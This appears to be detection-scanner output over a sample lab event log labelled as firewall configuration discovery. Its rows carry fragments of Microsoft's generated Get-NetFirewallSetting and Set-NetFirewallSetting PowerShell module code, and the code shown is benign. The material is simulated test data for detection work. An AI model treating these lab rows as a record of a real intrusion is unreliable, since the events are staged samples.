[Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,letization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulPptp')) { [object]$__cmdletization_value = ${EnableStatefulPptp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulPptp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachineTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteMachineTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteMachineTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTransportAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTransportAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTransportAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUserTunnelAuthorizationList')) { [object]$__cmdletization_value = ${RemoteUserTunnelAuthorizationList} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteUserTunnelAuthorizationList'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireFullAuthSupport')) { [object]$__cmdletization_value = ${RequireFullAuthSupport} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireFullAuthSupport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('CertValidationLevel')) { [object]$__cmdletization_value = ${CertValidationLevel} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CertValidationLevel'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowIPsecThroughNAT')) { [object]$__cmdletization_value = ${AllowIPsecThroughNAT} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowIPsecThroughNAT'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSAIdleTimeSeconds')) { [object]$__cmdletization_value = ${MaxSAIdleTimeSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxSAIdleTimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyEncoding')) { [object]$__cmdletization_value = ${KeyEncoding} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyEncoding'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnablePacketQueuing')) { [object]$__cmdletization_value = ${EnablePacketQueuing} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnablePacketQueuing'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdleti,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSetting'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.145 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetFirewallSetting { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetSecuritySettingData')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetSecuritySettingData')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption] ${Exemptions}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulFtp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${EnableStatefulPptp}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachineTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTransportAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUserTunnelAuthorizationList}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean] ${RequireFullAuthSupport}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.CRLCheck] ${CertValidationLevel}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecThroughNAT] ${AllowIPsecThroughNAT}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSAIdleTimeSeconds}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyEncoding] ${KeyEncoding}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PacketQueuing] ${EnablePacketQueuing}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Exemptions')) { [object]$__cmdletization_value = ${Exemptions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Exemptions'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.TrafficExemption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStatefulFtp')) { [object]$__cmdletization_value = ${EnableStatefulFtp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnableStatefulFtp'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 